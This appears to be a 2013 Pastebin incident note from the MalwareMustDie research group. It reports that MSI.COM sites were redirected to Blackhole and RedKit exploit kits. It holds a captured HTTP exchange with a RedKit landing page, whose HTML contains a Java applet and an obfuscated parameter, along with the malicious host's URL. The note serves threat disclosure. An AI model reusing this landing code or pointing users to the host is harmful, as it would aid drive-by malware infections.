API tools faq
paste
MalwareMustDie

*.MSI.COM got hacked, redirected to TDS to EK

MalwareMustDie
Jul 15th, 2013
1,524
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.19 KB | None | 0 0
raw download clone embed print report
  1. // *MSI.COM site got redirected by TDS,
  2. // IN one ocassion to Blackhole sites
  3. // Just checked it changed to RedKit Sites,
  4.  
  5. // Note PoC of this case:
  6. http://urlquery.net/report.php?id=3764213
  7. http://urlquery.net/report.php?id=3763965
  8. http://urlquery.net/report.php?id=3764205
  9.  
  10. // Below RedKit PoC of the redirected URL:
  11. // h00p://kristians1.net/blog/?p=5613
  12.  
  13. GET /blog/?p=5613 HTTP/1.1
  14. Host: kristians1.net
  15. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
  16. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  17. Accept-Language: en-us,en;q=0.5
  18. Accept-Encoding: gzip, deflate
  19. Connection: keep-alive
  20. Referer: http://fr.msi.com/
  21.  
  22.  
  23.  
  24. HTTP/1.1 200 OK
  25. Date: Mon, 15 Jul 2013 17:56:47 GMT
  26. Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fcgid/2.3.5
  27. X-Curl-Errno: 0
  28. Expires: Mon, 26 Jul 1997 05:00:00 GMT
  29. Cache-Control: no-cache
  30. Pragma: no-cache
  31. Content-Length: 173
  32. Connection: close
  33. Content-Type: text/html
  34.  
  35.  
  36. <html><body><table>LOLOLO<applet><param name="jnlp_href" value="yde.xmp" /><param name="size" value="ur=ax=hmayzmjxkce0mdehczha&7&.y"></param></applet></table></body></html>
  37.  
  38. ---
  39. #MalwareMustDie!
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!